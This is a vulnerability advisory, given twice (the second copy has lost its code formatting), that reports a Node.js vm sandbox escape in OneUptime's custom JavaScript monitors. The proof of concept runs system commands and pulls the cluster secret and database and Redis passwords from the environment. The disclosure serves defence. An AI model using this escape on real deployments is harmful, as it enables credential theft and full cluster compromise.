Summary
OneUptime lets project members write custom JavaScript that runs inside monitors. The problem is it executes that code using Node.js's built-in vm module, which Node.js itself documents as "not a security mechanism — do not use it to run untrusted code." The classic one-liner escape gives full access to the underlying process, and since the probe runs with host networking and holds all cluster credentials in its environment, this turns into a full cluster compromise for anyone who can register an account.
Details
The vulnerable code is in Common/Server/Utils/VM/VMRunner.ts at line 55:
vm.runInContext(script, sandbox, { timeout })
The JavaScript that reaches this call comes straight from the monitor's customCode field, which is only validated as Zod.string().optional() in Common/Types/Monitor/MonitorStep.ts:531. No AST analysis, no keyword filtering, nothing — just a string that goes directly into vm.runInContext().
Both CustomCodeMonitor.ts and SyntheticMonitor.ts import VMRunner directly inside the probe process. So when the probe picks up a monitor and runs it, the escape executes in the probe's own process — not a child process, not a container.
Two things make this especially bad:
First, the probe runs with network_mode: host (see docker-compose.base.yml:397) and carries ONEUPTIME_SECRET, DATABASE_PASSWORD, REDIS_PASSWORD, and CLICKHOUSE_PASSWORD as environment variables. Once you escape the sandbox you have all of those.
Second, the permission to create monitors is granted to Permission.ProjectMember — the lowest role — in Common/Models/DatabaseModels/Monitor.ts:46-51. There is no check that restricts Custom JavaScript Code monitors to admins only. And since open registration is on by default (disableSignup: false), any random person on the internet can reach this in about 30 seconds.
One more thing worth flagging: the IsolatedVM microservice is also affected despite its name. IsolatedVM/API/VM.ts:41 calls the exact same VMRunner.runCodeInSandbox() — it does NOT use the isolated-vm npm package. Workflow components and monitor criteria expressions both route through it and are equally exploitable.
PoC
- Register at
/accounts/register — signup is open by default, no invite needed
- Create a project — you get ProjectMember automatically
- Go to Monitors → Add Monitor → pick Custom JavaScript Code
- Paste this into the code field:
const proc = this.constructor.constructor('return process')();
const run = proc.mainModule.require('child_process').execSync;
return {
data: {
secret: proc.env.ONEUPTIME_SECRET,
db_pass: proc.env.DATABASE_PASSWORD,
redis_pass: proc.env.REDIS_PASSWORD,
id: run('id').toString().trim(),
hostname: run('hostname').toString().trim()
}
};
- Save the monitor and wait about 60 seconds for the probe to poll
- Open Monitor Logs — the result contains the cluster secret, database password, and the output of
id running on the probe host
That's it. No admin account, no special config, no extra steps.
Impact
This is a code injection vulnerability affecting any OneUptime deployment with open registration or any trusted user with ProjectMember access. The attacker gets arbitrary command execution on the probe host, all cluster credentials from the environment, and with host networking can directly connect to PostgreSQL, Redis, and ClickHouse using those credentials. One monitor creation → full cluster compromise.
The straightforward fix is to replace node:vm with the isolated-vm npm package, which provides real V8 isolate sandboxing and is the standard solution for this exact problem in the Node.js ecosystem.
References
Summary
OneUptime lets project members write custom JavaScript that runs inside monitors. The problem is it executes that code using Node.js's built-in
vmmodule, which Node.js itself documents as "not a security mechanism — do not use it to run untrusted code." The classic one-liner escape gives full access to the underlying process, and since the probe runs with host networking and holds all cluster credentials in its environment, this turns into a full cluster compromise for anyone who can register an account.Details
The vulnerable code is in
Common/Server/Utils/VM/VMRunner.tsat line 55:The JavaScript that reaches this call comes straight from the monitor's
customCodefield, which is only validated asZod.string().optional()inCommon/Types/Monitor/MonitorStep.ts:531. No AST analysis, no keyword filtering, nothing — just a string that goes directly intovm.runInContext().Both
CustomCodeMonitor.tsandSyntheticMonitor.tsimportVMRunnerdirectly inside the probe process. So when the probe picks up a monitor and runs it, the escape executes in the probe's own process — not a child process, not a container.Two things make this especially bad:
First, the probe runs with
network_mode: host(seedocker-compose.base.yml:397) and carriesONEUPTIME_SECRET,DATABASE_PASSWORD,REDIS_PASSWORD, andCLICKHOUSE_PASSWORDas environment variables. Once you escape the sandbox you have all of those.Second, the permission to create monitors is granted to
Permission.ProjectMember— the lowest role — inCommon/Models/DatabaseModels/Monitor.ts:46-51. There is no check that restricts Custom JavaScript Code monitors to admins only. And since open registration is on by default (disableSignup: false), any random person on the internet can reach this in about 30 seconds.One more thing worth flagging: the
IsolatedVMmicroservice is also affected despite its name.IsolatedVM/API/VM.ts:41calls the exact sameVMRunner.runCodeInSandbox()— it does NOT use theisolated-vmnpm package. Workflow components and monitor criteria expressions both route through it and are equally exploitable.PoC
/accounts/register— signup is open by default, no invite neededidrunning on the probe hostThat's it. No admin account, no special config, no extra steps.
Impact
This is a code injection vulnerability affecting any OneUptime deployment with open registration or any trusted user with ProjectMember access. The attacker gets arbitrary command execution on the probe host, all cluster credentials from the environment, and with host networking can directly connect to PostgreSQL, Redis, and ClickHouse using those credentials. One monitor creation → full cluster compromise.
The straightforward fix is to replace
node:vmwith theisolated-vmnpm package, which provides real V8 isolate sandboxing and is the standard solution for this exact problem in the Node.js ecosystem.References